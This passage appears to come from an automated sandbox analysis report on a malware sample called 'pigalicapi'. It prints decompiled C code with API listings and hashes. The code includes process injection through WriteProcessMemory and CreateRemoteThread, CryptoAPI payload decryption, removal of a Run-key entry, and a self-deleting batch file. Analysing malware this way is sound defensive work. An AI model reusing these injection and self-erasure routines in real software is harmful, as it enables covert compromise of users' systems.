                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48C0123400820957C1007B79AE0B6087AEC5700305F81057CE48566296D974A41547EB
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,10001A51,00003000,00000004,000000BE,?,10001A51,?), ref: 10001A01
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.606973844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3ccff9a06a89a97e6c3f6f2ca4e475eb5daa78dd1c2cff0adbe1b5a9ef65233e
                                                                                                                                                                                                                                                                          • Instruction ID: cb2b1c577f6c2eb629580bdbf47f529d576ce8939b3be3f1cb066eb9375a85c4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ccff9a06a89a97e6c3f6f2ca4e475eb5daa78dd1c2cff0adbe1b5a9ef65233e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59D0C9B4685208BBE710CB84CC56F6ABBACD704751F004185FE089B280D5B1AE0056A1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,?,?), ref: 1000182F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.606973844.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0afdfe0cb853849ea34192287f9d769febadd0286e44f929b2b370b7db5ff62e
                                                                                                                                                                                                                                                                          • Instruction ID: 84b35084efcff6c5970382eaf3cd32c1c52104bf155538fafba3cb0c341aa3c2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0afdfe0cb853849ea34192287f9d769febadd0286e44f929b2b370b7db5ff62e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8C04C7611430CABCB04DF98DC94DAB37ADBB8C650B04C508FA1D87204C630F9108BA4
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                                                                                          			E04008CF0(BYTE* _a4, DWORD* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				long* _v24;
                                                                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                                                                          				int _t32;
                                                                                                                                                                                                                                                                          				intOrPtr _t34;
                                                                                                                                                                                                                                                                          				long** _t35;
                                                                                                                                                                                                                                                                          				char* _t52;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t31 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t32 = CryptAcquireContextA( &_v12, _t31, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                                                                                                                                                                                                                                                          					if(_t32 == 0) {
                                                                                                                                                                                                                                                                          						_t32 = GetLastError();
                                                                                                                                                                                                                                                                          						_v16 = _t32;
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t52 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							_t32 = CryptAcquireContextA( &_v12, _t52, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                          						if(_t32 != 0) {
                                                                                                                                                                                                                                                                          							_t34 = _a16;
                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v20, _a12, _t34, 0);
                                                                                                                                                                                                                                                                          							if(_t34 != 0) {
                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                          								_t35 =  &_v24;
                                                                                                                                                                                                                                                                          								__imp__CryptDeriveKey(_v12, 0x6801, _v20, 1, _t35);
                                                                                                                                                                                                                                                                          								if(_t35 != 0) {
                                                                                                                                                                                                                                                                          									_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                          									CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x04008cf6
                                                                                                                                                                                                                                                                          0x04008d01
                                                                                                                                                                                                                                                                          0x04008e1a
                                                                                                                                                                                                                                                                          0x04008e20
                                                                                                                                                                                                                                                                          0x04008d25
                                                                                                                                                                                                                                                                          0x04008d25
                                                                                                                                                                                                                                                                          0x04008d35
                                                                                                                                                                                                                                                                          0x04008d3f
                                                                                                                                                                                                                                                                          0x04008d47
                                                                                                                                                                                                                                                                          0x04008d49
                                                                                                                                                                                                                                                                          0x04008d4f
                                                                                                                                                                                                                                                                          0x04008d59
                                                                                                                                                                                                                                                                          0x04008d6d
                                                                                                                                                                                                                                                                          0x04008d78
                                                                                                                                                                                                                                                                          0x04008d78
                                                                                                                                                                                                                                                                          0x04008d59
                                                                                                                                                                                                                                                                          0x04008d82
                                                                                                                                                                                                                                                                          0x04008d99
                                                                                                                                                                                                                                                                          0x04008da1
                                                                                                                                                                                                                                                                          0x04008da5
                                                                                                                                                                                                                                                                          0x04008db1
                                                                                                                                                                                                                                                                          0x04008db9
                                                                                                                                                                                                                                                                          0x04008dbb
                                                                                                                                                                                                                                                                          0x04008dc2
                                                                                                                                                                                                                                                                          0x04008dd5
                                                                                                                                                                                                                                                                          0x04008ddd
                                                                                                                                                                                                                                                                          0x04008df7
                                                                                                                                                                                                                                                                          0x04008dfe
                                                                                                                                                                                                                                                                          0x04008dfe
                                                                                                                                                                                                                                                                          0x04008ddd
                                                                                                                                                                                                                                                                          0x04008e08
                                                                                                                                                                                                                                                                          0x04008e08
                                                                                                                                                                                                                                                                          0x04008e14
                                                                                                                                                                                                                                                                          0x04008e14
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04008d82

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008D3F
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008D49
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008D78
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008D99
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008DB1
                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 04008DD5
                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008DF1
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008DFE
                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04008E08
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008E14
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008D30
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008D68
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 3718126946-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
                                                                                                                                                                                                                                                                          • Instruction ID: a60922051ccac58686ce7bb6d252e90d8c3d4a9338f0118c5879c090c3d284f0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5311B75A44209EBFB58DFA4C849BAE77B9FB44704F10C628F601B61C0D7B8A984CF60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04002510(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                                                                                          				void* _t138;
                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                                                                                                                                                          					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                          					_v12 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                                                                                                                                          					_v16 = VirtualAlloc(0, _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                          					if(_v16 != 0) {
                                                                                                                                                                                                                                                                          						_v32 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                          						if(_v32 != 0) {
                                                                                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                                                                                          							E04007B70(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
                                                                                                                                                                                                                                                                          							_t139 = _t138 + 0xc;
                                                                                                                                                                                                                                                                          							_v36 = 0;
                                                                                                                                                                                                                                                                          							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                          								E04007B70(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
                                                                                                                                                                                                                                                                          								_t139 = _t139 + 0xc;
                                                                                                                                                                                                                                                                          								_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							E040026D0(_v16, _v32);
                                                                                                                                                                                                                                                                          							if(WriteProcessMemory(_a4, _v32, _v16, _v12, 0) != 0) {
                                                                                                                                                                                                                                                                          								VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                          								_v28 = 0;
                                                                                                                                                                                                                                                                          								_v8 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28);
                                                                                                                                                                                                                                                                          								goto L14;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
                                                                                                                                                                                                                                                                          						if(_v32 != 0) {
                                                                                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x04002516
                                                                                                                                                                                                                                                                          0x04002521
                                                                                                                                                                                                                                                                          0x040026c2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002531
                                                                                                                                                                                                                                                                          0x0400253a
                                                                                                                                                                                                                                                                          0x0400254b
                                                                                                                                                                                                                                                                          0x04002554
                                                                                                                                                                                                                                                                          0x0400256a
                                                                                                                                                                                                                                                                          0x04002571
                                                                                                                                                                                                                                                                          0x04002596
                                                                                                                                                                                                                                                                          0x0400259d
                                                                                                                                                                                                                                                                          0x040025d7
                                                                                                                                                                                                                                                                          0x040025e6
                                                                                                                                                                                                                                                                          0x040025eb
                                                                                                                                                                                                                                                                          0x040025ee
                                                                                                                                                                                                                                                                          0x04002600
                                                                                                                                                                                                                                                                          0x0400263c
                                                                                                                                                                                                                                                                          0x04002641
                                                                                                                                                                                                                                                                          0x040025fd
                                                                                                                                                                                                                                                                          0x040025fd
                                                                                                                                                                                                                                                                          0x0400264e
                                                                                                                                                                                                                                                                          0x04002670
                                                                                                                                                                                                                                                                          0x04002692
                                                                                                                                                                                                                                                                          0x04002698
                                                                                                                                                                                                                                                                          0x040026bf
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040026bf
                                                                                                                                                                                                                                                                          0x0400267d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002683
                                                                                                                                                                                                                                                                          0x040025b6
                                                                                                                                                                                                                                                                          0x040025bd
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040025ca
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040025d0
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002573

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 04002564
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 04002590
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 040025B0
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040025CA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3668210933-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7b5e2a0a0879127798f9ea868be388b8c75a87b6f8ac87fe0ac4160dfdf198bf
                                                                                                                                                                                                                                                                          • Instruction ID: c64b90f60543cdd9f1b152a56a7e8b33ad9649d5cc2119a14d9a029aa2c63625
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b5e2a0a0879127798f9ea868be388b8c75a87b6f8ac87fe0ac4160dfdf198bf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0510D75E00209AFEB18DF94C895FAEB7B5FB48305F10C558E615BB280D778A981CB64
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                                                                                          			E040074A0() {
                                                                                                                                                                                                                                                                          				char _v524;
                                                                                                                                                                                                                                                                          				CHAR* _v528;
                                                                                                                                                                                                                                                                          				void* _v532;
                                                                                                                                                                                                                                                                          				void* _v536;
                                                                                                                                                                                                                                                                          				void* _v540;
                                                                                                                                                                                                                                                                          				char _v1060;
                                                                                                                                                                                                                                                                          				char _v1580;
                                                                                                                                                                                                                                                                          				char _v2364;
                                                                                                                                                                                                                                                                          				long _v2368;
                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v2384;
                                                                                                                                                                                                                                                                          				long _v2388;
                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v2460;
                                                                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                                                                          				void* _t124;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				E04007D20(E04007D20( &_v2364,  &_v2364, 0, 0x30c),  &_v1060, 0, 0x208);
                                                                                                                                                                                                                                                                          				_t123 = _t121 + 0x18;
                                                                                                                                                                                                                                                                          				 *0x4014370 = 1;
                                                                                                                                                                                                                                                                          				Sleep(0x3e8);
                                                                                                                                                                                                                                                                          				if(( *0x4014362 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v2368 = 0x207;
                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v1060, 0x207);
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v1060,  &_v2368);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, "\\");
                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, "pigalicapi");
                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, ".exe");
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0,  &_v1060, 0x207);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				SetFileAttributesA( &_v1060, 0x80);
                                                                                                                                                                                                                                                                          				wnsprintfA( &_v2364, 0x30b, ":repeat\r\ndel %s\r\nif exist %s goto :repeat\r\ndel %%0",  &_v1060,  &_v1060);
                                                                                                                                                                                                                                                                          				_t124 = _t123 + 0x14;
                                                                                                                                                                                                                                                                          				if( *0x401436c != 0) {
                                                                                                                                                                                                                                                                          					_t86 =  *0x401436c; // 0x24c
                                                                                                                                                                                                                                                                          					TerminateThread(_t86, 1);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v528 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                          				_v532 = 0x80000001;
                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v532 = 0x80000002;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v536 = 0;
                                                                                                                                                                                                                                                                          				if(RegOpenKeyExA(_v532, _v528, 0, 2,  &_v536) == 0) {
                                                                                                                                                                                                                                                                          					RegDeleteValueA(_v536, "pigalicapi");
                                                                                                                                                                                                                                                                          					RegCloseKey(_v536);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if(( *0x401435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					E04005E30(1);
                                                                                                                                                                                                                                                                          					_t124 = _t124 + 4;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				GetEnvironmentVariableA("TEMP",  &_v1580, 0x104);
                                                                                                                                                                                                                                                                          				GetTempFileNameA( &_v1580, "slf", GetTickCount() % 0xffff,  &_v524);
                                                                                                                                                                                                                                                                          				lstrcatA( &_v524, ".bat");
                                                                                                                                                                                                                                                                          				_t71 = CreateFileA( &_v524, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                          				_v540 = _t71;
                                                                                                                                                                                                                                                                          				if(_v540 != 0xffffffff) {
                                                                                                                                                                                                                                                                          					_v2388 = 0;
                                                                                                                                                                                                                                                                          					WriteFile(_v540,  &_v2364, lstrlenA( &_v2364),  &_v2388, 0);
                                                                                                                                                                                                                                                                          					E04007D20(E04007D20(CloseHandle(_v540),  &_v2384, 0, 0x10),  &_v2460, 0, 0x44);
                                                                                                                                                                                                                                                                          					_v2460.cb = 0x44;
                                                                                                                                                                                                                                                                          					_v2460.dwFlags = _v2460.dwFlags | 0x00000001;
                                                                                                                                                                                                                                                                          					_v2460.wShowWindow = 0;
                                                                                                                                                                                                                                                                          					if(CreateProcessA(0,  &_v524, 0, 0, 0, 0, 0, 0,  &_v2460,  &_v2384) != 0) {
                                                                                                                                                                                                                                                                          						_t71 = CloseHandle(_v2384.hThread);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					ExitProcess(0);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _t71;
                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                          0x040074cd
                                                                                                                                                                                                                                                                          0x040074d2
                                                                                                                                                                                                                                                                          0x040074d5
                                                                                                                                                                                                                                                                          0x040074e4
                                                                                                                                                                                                                                                                          0x040074f3
                                                                                                                                                                                                                                                                          0x0400750b
                                                                                                                                                                                                                                                                          0x0400751e
                                                                                                                                                                                                                                                                          0x04007547
                                                                                                                                                                                                                                                                          0x04007520
                                                                                                                                                                                                                                                                          0x0400752e
                                                                                                                                                                                                                                                                          0x0400752e
                                                                                                                                                                                                                                                                          0x04007559
                                                                                                                                                                                                                                                                          0x0400756b
                                                                                                                                                                                                                                                                          0x0400757d
                                                                                                                                                                                                                                                                          0x040074f5
                                                                                                                                                                                                                                                                          0x04007503
                                                                                                                                                                                                                                                                          0x04007503
                                                                                                                                                                                                                                                                          0x0400758f
                                                                                                                                                                                                                                                                          0x040075b4
                                                                                                                                                                                                                                                                          0x040075ba
                                                                                                                                                                                                                                                                          0x040075c4
                                                                                                                                                                                                                                                                          0x040075c8
                                                                                                                                                                                                                                                                          0x040075ce
                                                                                                                                                                                                                                                                          0x040075ce
                                                                                                                                                                                                                                                                          0x040075d4
                                                                                                                                                                                                                                                                          0x040075de
                                                                                                                                                                                                                                                                          0x040075f1
                                                                                                                                                                                                                                                                          0x040075f3
                                                                                                                                                                                                                                                                          0x040075f3
                                                                                                                                                                                                                                                                          0x040075fd
                                                                                                                                                                                                                                                                          0x04007628
                                                                                                                                                                                                                                                                          0x04007636
                                                                                                                                                                                                                                                                          0x04007643
                                                                                                                                                                                                                                                                          0x04007643
                                                                                                                                                                                                                                                                          0x04007652
                                                                                                                                                                                                                                                                          0x04007656
                                                                                                                                                                                                                                                                          0x0400765b
                                                                                                                                                                                                                                                                          0x0400765b
                                                                                                                                                                                                                                                                          0x0400766f
                                                                                                                                                                                                                                                                          0x04007698
                                                                                                                                                                                                                                                                          0x040076aa
                                                                                                                                                                                                                                                                          0x040076c6
                                                                                                                                                                                                                                                                          0x040076cc
                                                                                                                                                                                                                                                                          0x040076d9
                                                                                                                                                                                                                                                                          0x040076df
                                                                                                                                                                                                                                                                          0x0400770e
                                                                                                                                                                                                                                                                          0x0400773f
                                                                                                                                                                                                                                                                          0x04007747
                                                                                                                                                                                                                                                                          0x0400775a
                                                                                                                                                                                                                                                                          0x04007762
                                                                                                                                                                                                                                                                          0x04007794
                                                                                                                                                                                                                                                                          0x0400779d
                                                                                                                                                                                                                                                                          0x0400779d
                                                                                                                                                                                                                                                                          0x040077a5
                                                                                                                                                                                                                                                                          0x040077a5
                                                                                                                                                                                                                                                                          0x040077ae

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 040074E4
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 04007503
                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 0400752E
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0400C650), ref: 04007559
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,pigalicapi), ref: 0400756B
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.exe), ref: 0400757D
                                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 0400758F
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040075B4
                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(0000024C,00000001), ref: 040075CE
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,0400C690,00000000,00000002,00000000), ref: 04007620
                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 04007636
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04007643
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 0400766F
                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0400767C
                                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 04007698
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.bat), ref: 040076AA
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 040076C6
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000000), ref: 040076F9
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,00000000), ref: 0400770E
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0400771B
                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0400778C
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0400779D
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 040077A5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
